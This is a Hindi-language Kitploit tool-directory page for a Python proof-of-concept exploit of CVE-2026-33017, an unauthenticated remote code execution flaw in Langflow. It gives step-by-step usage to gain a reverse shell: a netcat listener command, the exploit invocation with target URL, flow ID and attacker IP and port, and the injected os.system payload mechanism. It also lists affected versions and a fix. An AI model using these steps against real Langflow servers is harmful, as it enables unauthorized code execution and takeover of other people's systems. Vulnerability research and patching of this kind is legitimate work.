Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/c0gnit00/cve-2026-33017
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubc0gnit00/cve-2026-33017

CVE-2026-33017

Python POC, Exploit for CVE-2026-33017

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33017 - Langflow बिना प्रमाणीकरण के RCE

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। लेखक इस टूल के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

अवलोकन

CVE-2026-33017 Langflow में एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता है, जो LangChain अनुप्रयोगों के निर्माण के लिए एक विज़ुअल फ्रेमवर्क है।

POST /api/v1/build_public_tmp/{flow_id}/flow एंडपॉइंट बिना प्रमाणीकरण के सार्वजनिक फ्लो बनाने की अनुमति देता है। जब वैकल्पिक data पैरामीटर प्रदान किया जाता है, तो एंडपॉइंट डेटाबेस से संग्रहीत फ्लो डेटा के बजाय हमलावर-नियंत्रित फ्लो डेटा (नोड परिभाषाओं में मनमाना Python कोड युक्त) का उपयोग करता है। यह कोड बिना किसी सैंडबॉक्सिंग के exec() को पास किया जाता है, जिसके परिणामस्वरूप बिना प्रमाणीकरण के रिमोट कोड निष्पादन होता है।

प्रभावित संस्करण

  • Langflow <= 1.7.3
  • Langflow >= 1.8.2 में ठीक किया गया

शोषण के लिए पूर्वापेक्षाएँ

  1. लक्ष्य Langflow इंस्टेंस में कम से कम एक सार्वजनिक फ्लो हो (डेमो, चैटबॉट, साझा वर्कफ़्लो के लिए सामान्य)
  2. हमलावर को सार्वजनिक फ्लो का UUID पता हो (साझा लिंक/URL के माध्यम से खोजा जा सकता है)
  3. किसी प्रमाणीकरण की आवश्यकता नहीं — केवल एक client_id कुकी (कोई भी मनमाना स्ट्रिंग मान)

स्थापना

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2026-33017.git
cd CVE-2026-33017
pip install requests

उपयोग

1. एक लिसनर सेट करें

अपनी हमलावर मशीन पर, रिवर्स शेल को पकड़ने के लिए एक netcat लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 CVE-2026-33017.py --url http://target:7860 --flow-id <UUID> --lhost <YOUR_IP> --lport 4444

तर्क

उदाहरण

root@kitploit:~
# टर्मिनल 1: लिसनर शुरू करें
nc -lvnp 4444

# टर्मिनल 2: एक्सप्लॉइट फायर करें
python3 CVE-2026-33017.py \
    --url http://192.168.1.100:7860 \
    --flow-id 550e8400-e29b-41d4-a716-446655440000 \
    --lhost 10.0.0.5 \
    --lport 4444

यह कैसे काम करता है

  1. craft_malicious_node() — हमलावर-नियंत्रित Python कोड के साथ एक CustomComponent युक्त एक दुर्भावनापूर्ण Langflow नोड बनाता है। कोड में एक शीर्ष-स्तरीय os.system() कॉल शामिल है जो ग्राफ निर्माण के दौरान निष्पादित होती है (फ्लो के "चलने" से पहले)।

  2. fire_payload() — दुर्भावनापूर्ण नोड को JSON के रूप में बिना प्रमाणीकरण वाले build_public_tmp एंडपॉइंट पर एक यादृच्छिक client_id कुकी के साथ भेजता है।

  3. कोड निष्पादन — सर्वर हमलावर-आपूर्ति किए गए फ्लो डेटा को पार्स करता है, कस्टम घटक को इंस्टैंशिएट करता है, और prepare_global_scope() के दौरान एम्बेडेड कोड पर exec() कॉल करता है। शीर्ष-स्तरीय असाइनमेंट _r = __import__('os').system(...) तुरंत कमांड निष्पादन को ट्रिगर करता है।

  4. रिवर्स शेल — पेलोड आपके लिसनर पर वापस कनेक्ट होने वाला एक Python रिवर्स शेल स्पॉन करता है।

भेद्यता विवरण

मूल कारण

build_public_tmp एंडपॉइंट बिना प्रमाणीकरण के (सार्वजनिक फ्लो के लिए) डिज़ाइन किया गया है, लेकिन यह गलत तरीके से data पैरामीटर के माध्यम से हमलावर-आपूर्ति किए गए फ्लो डेटा को स्वीकार करता है। जब data प्रदान किया जाता है, तो यह संग्रहीत फ्लो डेटा को बायपास करता है और हमलावर-नियंत्रित नोड्स को सीधे ग्राफ बिल्डर को भेजता है।

अनुशंसित समाधान

build_public_tmp से data पैरामीटर हटाएँ। सार्वजनिक फ्लो को केवल डेटाबेस से अपना संग्रहीत फ्लो डेटा निष्पादित करना चाहिए, कभी भी हमलावर-आपूर्ति किए गए डेटा को नहीं।

संदर्भ

  • NVD - CVE-2026-33017
  • Langflow रिलीज़ 1.8.2

लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

टूल डाउनलोड करें
तर्कआवश्यकविवरण
--urlहाँलक्ष्य URL (जैसे, http://localhost:7860)
--flow-idहाँसार्वजनिक फ्लो UUID
--lhostहाँआपका लिसनर IP पता
--lportहाँआपका लिसनर पोर्ट
--timeoutनहींसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)